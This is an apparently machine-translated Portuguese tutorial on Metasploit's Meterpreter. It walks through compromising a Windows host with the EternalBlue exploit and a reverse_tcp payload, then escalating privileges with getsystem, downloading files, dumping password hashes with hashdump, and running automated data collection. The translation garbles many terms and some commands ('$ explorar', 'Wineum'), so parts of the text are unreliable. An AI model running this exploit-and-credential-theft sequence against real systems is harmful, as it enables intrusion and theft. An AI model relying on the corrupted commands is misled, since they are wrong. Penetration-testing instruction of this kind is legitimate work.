Introdução ao medidor
Meterpreter é uma carga útil de ataque na estrutura de metasploit que permite que o agressor controle e navegue no computador da vítima através de um shell de comando. Pode ser uma ferramenta muito versátil quando se trata de teste de penetração. É uma ferramenta de pós-exploração baseada na injeção de DLL na memória, o que significa que ela realiza a DLL injetada, criando um novo processo que exige que o sistema execute a DLL injetada. Ele pode dar acesso a um shell de comando invisível em uma máquina de vítimas, permitindo executar executáveis e redes de perfil.
Foi originalmente escrito para metasploit 2.x e é atualizado para o metasploit 3.
Discutiremos os usos do Meterpreter em detalhes, mas antes disso, vamos ter uma palavra sobre cargas úteis em geral
O que são cargas úteis?
Cargas úteis no metasploit são módulos, o que significa que são trechos de códigos dentro do metasploit que são executados no sistema remoto que atingimos. O módulo de exploração é enviado primeiro, que instala o módulo de carga útil no sistema. Em seguida, a carga útil concede acesso ao atacante (restrito ou completo, depende do conteúdo da carga útil). Para elaborar ainda mais o funcionamento das cargas úteis, devemos discutir seus tipos, que são 3 no total:
Músicas
Essas cargas úteis são completamente independentes, o que significa que elas podem ser tão básicas quanto os códigos do gatekeeper que permitem ao usuário um sistema de destino.
Estagiários
Os estagiários são cargas úteis que reúnem pedidos no sistema de destino e o envia para o atacante. Estabelece a conexão entre a vítima à nossa máquina local.
Estágios
Depois que os estagiários têm acesso ao sistema, eles baixam os módulos de estágios. Os módulos de estágios removem a tampa do tamanho do medidor.
Exemplos de estágios seriam um shell simples, shell 'iPWN' do iPhone, módulos de meterpreter, injeção de VNC.
Você pode descobrir o tipo de carga útil imaginando seu nome. Cargas úteis únicas são geralmente do formato /
Exploração com medidor
Primeiro de tudo, inicie o console MSF digitando o seguinte comando terminal na janela Kali Terminal.
$ sudo msfconsole
Estamos usando reverse_tcp como o stager e o medidor como o estágio.
Começaremos configurando a eterna exploração azul. Selecione (MS17_010_ETERNALBLUE) em seguida, defina o Windows/x64/meterpreter/reverse_tcp como a carga útil selecionada
Em seguida, definir as configurações de exploração e execute a exploração com o comando de exploração:
$ define a carga útil Windows/x64/meterpreter/reverse_tcp
$ Set Rhost 192.168.198.136
$ explorar
O Exploração EternalBlue foi ativado com sucesso.
Pós -exploração
Acessamos e manipulamos o sistema já comprometido durante a pós-exploração.
Podemos fazer muitas coisas agora que temos acesso ao sistema, mas, como mencionado acima, devemos permanecer focados principalmente no download de informações e na obtenção de credenciais do usuário aqui
Gerenciando o privilégio de acesso:
Dependendo do módulo de carga útil e da exploração que você usou, você pode enfrentar certas restrições de acesso que prejudicarão severamente suas habilidades para manobrar a máquina da vítima. Você pode contornar esse problema com a escalada de privilégios através da exclusão de senhas e adulteração dos registros. Você também pode escalar privilégios usando o System Get do Meterpreter -Comã.
$ getsystem
$ getuid
Transferência de arquivos com medidor
Com o MeterPreter, você pode baixar um arquivo usando o comando $ download-.
$ download/windows/system32/drivers/etc/hosts
Da mesma forma, você também pode enviar informações para a máquina, usando $ upload- comando
Extraindo credenciais de usuário:
Use o código Script Credential_Collector para extrair informações da conta de usuário ou usar o módulo de pós -pós -dump de hash para efeito semelhante.
Usaremos o hash dump pós módulo para prosseguir com a colheita das credenciais. Digite o seguinte comando msf.
$ run post/windows/gather/hashdump
Como podemos ver, obtivemos as contas Coen, Guest e Admin. O hash lm (admin's) e o hash ntlm (hóspede) refere -se a senhas vazias, enquanto o hash coen é uma senha que você precisará para quebrar. Você pode fazer isso usando um cracker de senha.
Automatizando a raspagem do sistema
Pode ser tedioso coletar informações com declarações de entrada individuais que você precisa continuar alimentando o shell de comando. Convenientemente, você pode automatizar um pouco esse processo com o Script Vineum. O script coleta informações da vítima e baixa os dados em nossa máquina local. Você será informado de onde a saída está sendo salva, como você pode ver na quarta linha de cima:
$ Run Wineum
Lembre -se de que o caminho onde a saída para cada comando é armazenada pode ser diferente daquele em exibição aqui.
Vamos mexer um pouco mais
Executando arquivos
Você pode executar qualquer arquivo no sistema usando: Execute -f . Isso inclui arquivos executáveis e programas com vários arquivos de suporte. Por exemplo, para executar o aplicativo de calculadora embutida no sistema operacional Windows, Type Execute -f Calc.exe
Tomando capturas de tela
Você também pode capturar capturas de tela do ponto de vista do usuário. Basta digitar a captura de tela no shell de comando do Meterpreter, e você terá uma captura de tela da tela no sistema.
$ execute -f calc.exe
$ screenshot
Conclusão:
Esta foi uma breve introdução ao plug -in do Meterpreter na estrutura do metasploit, juntamente com um curto guia, mostrando seus usos mais básicos. Aprendemos aqui como podemos violar um sistema Windows OS com a EternalBlue Explorit para obter acesso e depois usar o Meterpreter para escalar privilégios, reunir informações manualmente e pelo comando automatizando VineUs-. Também aprendemos a executar arquivos na máquina da vítima.
O Meterpreter pode servir como um meio apreciável de detecção de vulnerabilidades, apesar de ser um conglomerado de ferramentas básicas na estrutura do metasploit.